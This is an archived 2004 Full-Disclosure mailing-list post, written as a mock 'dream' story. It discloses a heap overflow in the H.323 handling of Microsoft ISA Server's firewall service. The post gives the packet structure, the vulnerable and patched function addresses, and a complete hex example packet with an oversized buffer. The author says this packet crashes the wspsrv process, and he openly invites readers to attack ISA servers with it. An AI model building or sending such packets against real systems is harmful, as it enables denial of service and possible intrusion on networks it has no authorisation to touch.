lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200402070747.i177lMg0056519@mailserver1.hushmail.com>
Date: Fri,  6 Feb 2004 23:47:22 -0800
From: <deleon@...hmail.com>
To: full-disclosure@...ts.netsys.com
Cc: bugtraq@...urityfocus.com, ntbugtraq@...ugtraq.com
Subject: Phrack #64 Is Release!


HAAHAHAHHAH just kidding, is only ms004-04 attacking ways.
Soooo we have our fun with isa, now you can also! Now even people who
can not afford the corporate firewall, can still own one!

So I have this crazy dream a few weeks earlier (maybe ate too much acid)
that I send some bytes to a isa server and it withers up like ding spider.
This is funny because I thought spiders coming out from my arm, but that
is an other bad story for next email. Anyway bytes went like this- 

03 00 xx xx 08 02 00 00-5a 7e xx xx 05 00 80 00 
00 00 42 42 42 42 42 42-42 42 42 42 42 42 42 42 
42 42 04 0A xx xx 80 xx-xx xx xx buffer starts here 

And somehow I know that first 13 bytes were error packet sent back from
isa, like when you have really nice dream that you know the girl is michele
branch even though you can't see the face, almost like that. Others xx
are for lengths, yes these were xx in the dream and somehow again I know
there are for length. 



Soo I was very surprise when I woke and tried it and it worked. I had
to plugged in buffer but then I saw microsoft firewall service (wspsrv
process) crash and after then it was more dead than a foundstone christmas
party. I discover it was a heap overflow and I even found how. The problem
is h323asn1.dll which ms004-04 patch, and microsoft tried to make this
hard to find by changing lost of fake things, but we have no problem
seeing the True Patch. Old function is sub_40fa6d, new is sub_40f627,
 and patch checks a word to see that it is short enough. This word is
actually length of a string that follows (use ethereal to understand
packet) and it can be any length but a few kb is enough to overflow in
ways similar to a eeye bar tab at defcon. 

So most easy way to get to broken code is to use second h225 decode function,
 this is sub_419011 in unpatched dll. And of course a breakpoint of the
function will show that it is reach after sending error packet back to
isa. Then just follow trace through and see how to get to sub_40fa6d.

Simple like that. Oh yeah here are ways to make lengths---- 
03 00 
(word length of all packet, even 03 00, all is big byte first order)

08 02 00 00 5a 7e 
(word length of data that follows) 
05 00 80 00 00 00 
(16 byte conference id, I use BBBBBBBBBBBBBBBB above) 
04 0a 
(frag length of all data that follows) 
80 
(frag length of all data that follows) 
(word length of string that follows -1, like 0 means length is 1, 1 means
length is 2 etc.) 
(very long string) 

And a frag length can be most easy done as 0x8000+length, like 0x9234
means length of next data that follows is 0x1234. More gets supported
but trust me this will work for exploit ;) 

Like an example-- 
03 00 10 2f 08 02 00 00-5a 7e 10 23 05 00 80 00 
00 00 42 42 42 42 42 42-42 42 42 42 42 42 42 42 
42 42 04 0a 90 09 80 90-06 10 03 (buffer with 0x1004 'A') 


I wish this is right, I cant sleep so much since all the spiders keep
coming out from my arm. But they help me type this email so you can start
having isa fun also. 
Don't feed the kids! Keep the knowledge free.



Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ